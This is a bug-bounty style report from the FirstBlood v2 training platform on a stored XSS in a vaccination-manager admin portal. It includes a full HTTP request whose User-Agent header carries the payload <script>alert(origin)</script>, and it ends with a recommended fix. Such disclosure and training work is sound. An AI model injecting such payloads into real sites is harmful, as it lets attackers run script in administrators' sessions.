FirstBlood-#794Stored XSS via User-Agent header value in /vaccination-manager/portal.php
This issue was discovered on FirstBlood v2

On 2021-10-28, panya Level 7 reported:

The vaccination manager admin portal unsafely reflects a User-Agent header's value (saved to the DB when a user sends vaccination proof via /vaccination-manager/pub/submit-vaccination-proof.php endpoint), which leads Stored XSS.

Example request:

POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Content-Length: 66604
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6Ttb4gutNkKWWkV6
User-Agent: <script>alert(origin)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

Content-Disposition: form-data; name="email"

[email protected]
Content-Disposition: form-data; name="vaccination_proof"; filename="pepe.png"
Content-Type: image/png



Notice that I changed the User-Agent header value to <script>alert(origin)</script>.

The script tag is reflected in the vaccination-manager's admin portal and triggers an alert with the text "".


An attacker could execute JS code on behalf of an vaccination-manager's admin.


The User-Agent header's value should be properly escaped or sanitized.

P2 High

Endpoint: /vaccination-manager/portal.php

Parameter: User-Agent

Payload: <script>alert(origin)</script>

FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.